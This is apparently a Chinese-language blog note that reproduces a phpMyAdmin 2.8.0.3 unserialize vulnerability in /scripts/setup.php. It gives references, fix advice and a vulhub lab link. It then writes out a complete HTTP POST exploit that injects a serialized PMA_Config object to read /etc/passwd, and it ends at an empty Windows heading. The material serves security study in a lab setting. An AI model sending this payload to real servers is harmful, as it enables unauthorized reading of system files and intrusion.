文章參考
http://www.mottoin.com/detail/521.html
https://www.cnblogs.com/xhds/p/12579425.html
雖然是很老的漏洞,但在內網大部分都是用着老版本,在外網存在的也為數不少
漏洞文件
/scripts/setup.php
影響版本
已知版本為 2.8.0.3
修復建議
盡快升級到最新版 將setup.php中28行中的"configuration"改為傳入其他值 直接刪除scripts目錄,防止被惡意攻擊。
環境搭建
https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
復現
1.構造EXP (Linux版)
POST /scripts/setup.php HTTP/1.1 Host: your-ip:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 80 action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
2. 構造EXP (Windows版)